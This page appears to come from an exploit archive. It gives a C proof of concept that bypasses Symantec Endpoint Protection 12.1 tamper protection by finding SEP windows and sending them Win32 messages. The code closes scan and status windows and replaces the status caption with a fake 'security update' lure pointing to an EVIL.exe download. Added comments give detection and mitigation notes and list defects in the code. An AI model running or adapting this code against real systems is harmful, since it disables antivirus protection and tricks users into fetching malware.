Symantec Endpoint Protection 12.1 - Tamper-Protection Bypass

Properties

Published:
13.11.2017
Target:
Symantec Endpoint Protection 12.1

Code

#include 
#include 
#define VICTIM "DevViewer.exe"
 
//By HYP3RLINX
//ISR: ApparitionSec
//Symantec EP Protection - Tamper Protection Bypass Vulnerability
//Tested successfully on Symantec 12.1.6 (12.1 RU6 MP5) build 7004 Symantec 12.1.7004.6500 Windows 7 
//How: FindWindow / SendMessage Win32 API 
//Impact: DOS / Integrity Compromised
//TO-DO: Get Window text for SavUI.exe and DOS to prevent AV scans.
 
// PoC driver: a polling loop that locates Symantec Endpoint Protection (SEP)
// client windows by their caption text and sends them ordinary Win32 window
// messages from this separate process. The observation the page reports is
// that the SEP UI, running on the same interactive desktop, honours
// SetWindowText / WM_SYSCOMMAND from any process that can obtain its window
// handle -- the "tamper protection" named in the title does not cover this
// interference with the product's own UI.
//
// Defender notes (review):
//  - Detection: the observable behaviour is a non-SEP process repeatedly
//    calling FindWindow() on SEP window titles and sending
//    WM_SYSCOMMAND/SC_CLOSE (or SetWindowText) to the results; the symptom is
//    SEP windows closing, or their captions changing, without user action.
//  - Mitigation is vendor-side: a security product's UI should not trust
//    window messages from peer processes on the desktop (e.g. run the UI at a
//    higher integrity level so UIPI filters such messages, and keep state
//    changes in the service rather than the window).
// Known issues in the listing itself, deliberately left as-is here:
//  - `void main` is not standard C/C++ (`int main` is).
//  - `sleep(1)` is the POSIX seconds-granularity call; Win32's is Sleep(ms).
//    The #include lines are blank on this page, so which header the author
//    had in scope cannot be confirmed from here.
//  - x2/x3 are passed to SendMessage without a NULL check, and the x4 guard
//    tests `x` rather than `x4`.
void main(void){
  
   // Polls forever; there is no exit condition.
   while(1){
             
   // FindWindow with a NULL class matches any top-level window with this caption.
   HWND hWnd = FindWindow( NULL, TEXT("Status - Symantec Endpoint Protection"));
    
   if(hWnd!=NULL){
     // SetWindowText replaces the caption of the SEP status window with
     // text chosen by this process (the string is the page's demo payload).
     SetWindowText(hWnd, "*** Important Security Update, Visit: http://PWN3D.com/EVIL.exe download and follow instructions. ***");
     // Commented-out in the original: closing the status window would prevent
     // a user from running AV scans from the SEP UI (author's note).
    //SendMessage(hWnd, WM_SYSCOMMAND, SC_CLOSE, 0);   
   }  
    
   // Author's unused alternative lookup via FindWindowEx.
   //HWND savUI = FindWindowEx(0, 0, "Symantec Endpoint Protection", 0);
    
   // Close the "DevViewer" window; guarded on a non-NULL handle.
   HWND x = FindWindow(NULL, TEXT("DevViewer"));
   if(x!=NULL){
     SendMessage(x, WM_SYSCOMMAND, SC_CLOSE, 0);   
  }
   
   // No NULL guard here: FindWindow's result is sent to SendMessage even when
   // no such window exists (same for x3 below).
   HWND x2 = FindWindow(NULL, TEXT("DoScan Help"));
   SendMessage(x2, WM_SYSCOMMAND, SC_CLOSE, 0); 
 
   HWND x3 = FindWindow(NULL, TEXT("Sylink Drop"));
   SendMessage(x3, WM_SYSCOMMAND, SC_CLOSE, 0);  
    
  // Caption is date-specific to the author's test run, so this lookup only
  // matches that exact scan window.
  HWND x4 = FindWindow(NULL, TEXT("Manual Scan started on 7/8/2016"));
   // Note: this guard tests x (the DevViewer handle), not x4.
   if(x!=NULL){
     SendMessage(x4, WM_SYSCOMMAND, SC_CLOSE, 0);   
  }
   
   // POSIX sleep(seconds); on Win32 the equivalent is Sleep(milliseconds).
   sleep(1);
    
   }  
}